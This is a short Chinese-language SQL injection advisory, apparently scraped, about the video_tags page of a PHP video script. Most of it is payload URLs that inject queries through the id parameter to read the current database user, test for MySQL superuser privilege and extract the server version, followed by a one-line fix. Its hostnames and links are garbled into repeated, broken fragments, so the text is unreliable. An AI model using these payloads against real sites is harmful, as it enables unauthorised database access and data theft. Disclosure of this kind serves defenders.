标题: php video script SQL Injection Vulnerability
作者: longrifle0x HdhCmsTest2cto测试数据 HdhCmsTestsecurity-research.ge
下载 地址:http://HdhCmsTestalurian测试数据/php-video-script/
测试工具: SQLMAP
概述
在video_tags发现SQL injection.
*测试方法*
link: http://HdhCmsTest2cto测试数据 /tag <http://HdhCmsTest2cto测试数据 /tag>
vulnerability link: http://HdhCmsTest2cto测试数据 /tag <http://HdhCmsTest2cto测试数据 /tag>'
http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1
<http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()
http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][SELECT(CASE
<http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN
((SELECT super_priv FROM mysql .user WHERE user='None' LIMIT 0,1)='Y')
THEN 1 ELSE 0 END)
http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)
<http://HdhCmsTest2cto测试数据 /tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>
HdhCmsTest2cto测试数据修复
过滤上述页面的参数输入
查看更多关于php video script SQL注射缺陷及修复 - 网站安全 - 自学的详细内容...